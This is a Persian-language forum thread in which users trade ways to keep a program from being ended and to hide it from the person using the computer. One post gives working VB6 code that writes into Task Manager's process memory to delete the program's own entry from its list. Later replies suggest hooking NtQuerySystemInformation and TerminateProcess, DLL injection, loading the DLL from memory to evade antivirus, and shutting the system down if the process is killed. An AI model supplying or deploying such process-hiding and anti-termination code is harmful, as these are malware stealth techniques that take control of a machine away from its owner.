|||||||| يك سوال تخصصي در رابطه با End process دارم؟؟!|||||||||

[MichaelQwerty]

چون نرم افزارهایی هستن که پروسه مخفی رو نمایش میدن ولی اگه یه کد قوی داری بزار من برای مخفی کردن از این کدها استفاده می کنم که زیاد قوی نیست
Private Type bkh
flag As Long
psz As Long
lParam As Long
pt As Long
vkDirection As Long
End Type
Private Declare Function VirtualAllocEx Lib "kernel32.dll" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal hwnd As Long, ByRef lpdwProcessId As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function VirtualFreeEx Lib "kernel32.dll" (ByVal hProcess As Long, ByRef lpAddress As Any, ByRef dwSize As Long, ByVal dwFreeType As Long) As Long
Private Declare Function SendMessage Lib "user32.dll" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Function GetCurrentProcessId Lib "kernel32.dll" () As Long
Private Declare Function KillTimer Lib "user32.dll" (ByVal hwnd As Long, ByVal nIDEvent As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function FindWindowEx Lib "user32.dll" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long

Private Sub Hide_Process(Name As String)
Dim pName As Long
Dim pType As Long
Dim l As Long
Dim Tid As Long
Dim hTid As Long
Dim pid As Long
Dim h As Long
Dim i As Long
Dim hProcess As Long
Dim f As bkh
Dim s As String
Dim bkh() As Byte
h = FindWindow(vbNullString, "Windows Task Manager")
KillTimer h, 0
h = FindWindowEx(h, 0, "#32770", vbNullString)
h = FindWindowEx(h, 0, "SysListView32", vbNullString)
If h = 0 Then Exit Sub
f.flag = 8 Or &H20
Call GetWindowThreadProcessId(h, pid)
hProcess = OpenProcess(1082, 0, pid)
bkh = StrConv(Name, vbFromUnicode)
pName = VirtualAllocEx(hProcess, 0, Len(Name) + 1, &H1000, 4)
WriteProcessMemory hProcess, pName, VarPtr(bkh(0)), Len(Name), l
f.psz = pName
pType = VirtualAllocEx(hProcess, 0, Len(f), &H1000, 4)
WriteProcessMemory hProcess, pType, VarPtr(f.flag), Len(f), l
i = SendMessage(h, &H1000 + 13, 0, pType)
If i <> -1 Then SendMessage h, &H1000 + 8, i, 0
VirtualFreeEx hProcess, pType, Len(f), &H8000
VirtualFreeEx hProcess, pName, LenB(Name) + 1, &H8000
End Sub
Private Sub Timer1_Timer()
Hide_Process CStr(App.EXEName & ".exe")
End Sub

[MichaelQwerty]

سلام دوستان عزیز
در پست های قبلی اشاره شده بود که از راه hook میشه جلوی end process را گرفت
آیا منظور اینه که وقتی کاربر ctrl+Alt+Del گرفت با استفاده از hook تشخیص بدیم و windows task manager را ببندیم؟؟!

[*Batman*]

سلام.
خیر . منظور اینه که توابعی نظیر NtQuerySystemInformation را Hook کنیم.
بستن Task Manager که راحته و اصلا به درد نمیخوره .

[MichaelQwerty]

اگر اطلاعت بیشتری داری میشه در این باره بیشتر توضیح بدی آیا سورسی در این باره داری
و این که وقتی از این روش استفاده میشه چه اتفاقی می افته یعنی وقتی کاربر بخواد برنامه رو end process کنه error میده یا نه بسته میشه و دوباره باز میشه

[*Batman*]

سلام

در مورد Hook TerminateProcess یا Hook ZwTerminateProcess جستجو کنید به یه نتیجه هایی میرسید،
در واقع اگه بتونی این توابع رو اصطلاحا هوک کنی میتونی اینکاری که میخوای انجام بدی
ولی خوب به این راحتی هم نیست و سورس ساده هم در این مورد کم پیدا میشه
من خودم یه کم در این زمینه کار کردم زیاد سورس در این مورد ندارم که بزارم خصوصا برای VB

شاد باشید

با جناب hoax3r کاملا موافقم. سورس در این زمینه به سختی پیدا میشه. مخصوصا برای ویبی. کار با Hook مشکله.
البته غیر از Terminateprocess ای پی آی های دیگه ای هم برای بستن یه پروسه هست. که اگه بخوای هوک کنی باید حواست به همه اونا باشه. مثلا میشه هندل پنجره برنامت رو گرفت و با postmessage برنامه رو بست.

ضمنا آنتی ها به هوک گیر میدن. یعنی اگه آنتی ران باشه اصلا اجازه اجرای برنامت رو نمیده.

منم حرف دوستان رو تایید میکنم.
تو VB و Net. انجام این کار مشکله.
اون API قبلی که نام بردم به درد مخفی کردن میخوره.
اگر Terminateprocess را Hook کنید مشکلتون با TaskManager حل میشه.

به هر حال تو لینک زیر برای VB هم یک سری راهکار ارائه شده.امیدوارم مفید باشه:

کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

[*Batman*]

فکر کنم این همونه که دنبالشی:

کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

[MichaelQwerty]

بسیار متشکرم
فقط یه عیب داره اینه که هر جابرنامه رو ببرمش بایدفایل dll رو هم ببرم

[Payman_62]

سلام.
من برنامه رو ندیدم. ولی اگه از dll استفاده کرده نمیشه گفت با ویبی نوشته شده. مهم dll هست که همه کارارو میکنه.

[MichaelQwerty]

درسته حق با شماست Dll به زبان cpp نوشته شده است
هر چند برنامه رو توسط یه نرم افزار که به زبان Language: Visual Basic 2008
نوشته شده بود بستم
اما چون process explorer و windows task manager نتونستند ببندن جالبه
یه شخصی گفته بود می تونی برنامه رو طوری بنویسی که اگه process بسته شد سیستم خاموش کنه این راه جالبی مثل Smss.exe ویندوز که بعد از 60 ثانیه سیستم خاموش میکنه (هر چند میشه جلوشو گرفت)
ولی وقتی کاربر End process کنه هیچ رویدادی اتفاق نمی افته!؟
اگه یه برنامه هم کنارش بزاریم که مراقب باشه امکان داره کاربر اول اونو ببنده

[*Batman*]

کاملا درسته. در واقع از dll injection استفاده شده.
من با خاموش کردن سیستم موافق نیستم.فکر نمیکنم نیازی باشه. یه پیغام ساده کفایت میکنه.
میتونید dll رو به عنوان Resource تو فایل اجرایی قرار بدید و هنگام اجرا اونو Extract کنید و درپایان پاکش کنید.
میشه dll رو تو حافظه هم load کرد.منتها انجامش با VB خیلی وحشتناکه.شایدم اصلا نشه. من واقعا نمیدونم.
اینجا رو ببین :

کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید